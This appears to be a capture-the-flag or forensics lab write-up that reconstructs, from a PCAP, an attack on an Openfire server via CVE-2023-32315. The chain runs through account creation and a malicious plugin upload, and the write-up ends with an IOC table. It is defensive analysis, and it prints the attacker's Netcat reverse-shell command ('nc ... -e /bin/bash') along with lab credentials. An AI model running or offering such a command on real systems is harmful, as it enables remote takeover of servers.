Breach
Overview
TechNova Corp runs an Openfire-powered internal messaging server. The ShadowHunters threat group exploited a critical path traversal vulnerability in the Openfire admin console (CVE-2023-32315), gaining unauthenticated access to the admin panel, creating rogue accounts, uploading a malicious plugin for remote code execution, and ultimately establishing a reverse shell. The task is to analyse the provided PCAP in Wireshark and reconstruct the full attack chain.
Investigation
Initial Access — CVE-2023-32315
CVE-2023-32315 is a path traversal vulnerability in the Openfire administration console that allows an unauthenticated attacker to access restricted pages by manipulating the URL path. The attacker used this to reach the admin login panel without valid credentials and begin their operation.
Filtering HTTP traffic in Wireshark and following the TCP streams reveals the full attack chain in order.
Login — CSRF Token Extraction
The first captured request is a POST to the Openfire admin login endpoint. Inspecting the form data in Wireshark shows the CSRF token submitted with the login:
Form item: "csrf" = "VypyY6v0F1w8iNK"
The credentials used were admin:adminnothere. The CSRF token is required by the Openfire admin panel to prevent cross-site request forgery — the attacker extracted it from the login page before submitting the form.
Account Creation — T1136.001
With admin access established, the attacker created two new user accounts to maintain persistence in case the original access was revoked:
ix5768— first account createdv01zxk— second account created
These are visible in Wireshark as POST requests to the Openfire user management endpoint, with the usernames visible in the form data.
The attacker then logged back in using v01zxk to continue operations — likely to avoid leaving traces on the original admin account session.
Plugin Upload — T1505.003
The most critical step in the chain is the upload of a malicious Openfire plugin. Openfire supports JAR-based plugins that extend server functionality — the attacker abused this legitimate feature to deploy a remote management tool.
Wireshark captures the multipart form upload with the filename clearly visible:
form-data; name="uploadfile"; filename="openfire-management-tool-plugin.jar"
The malicious JAR plugin maps to T1204.002 (User Execution: Malicious File) — once uploaded, the Openfire server loads and executes the JAR directly, treating it as a legitimate plugin while it silently provides the attacker with remote code execution capability.
Remote Code Execution — whoami
With the plugin active, the attacker used it to execute commands on the server. The first command sent was:
whoami
This is standard post-exploitation recon to confirm the execution context and identify what user the Openfire service is running as.
Reverse Shell — Netcat
Satisfied with RCE confirmation, the attacker established a persistent reverse shell using Netcat, connecting back to their machine at 192[.]168[.]18[.]160 on port 8888:
nc 192.168.18.160 8888 -e /bin/bash
The -e /bin/bash flag binds a bash shell to the connection, giving the attacker a fully interactive shell session on the Openfire server.
IOCs
| Type | Value |
|---|---|
| CVE | CVE-2023-32315 |
| IP | 192[.]168[.]18[.]160 |
| Port | 8888 |
| File | openfire-management-tool-plugin.jar |
| Username | ix5768 |
| Username | v01zxk |
| CSRF Token | VypyY6v0F1w8iNK |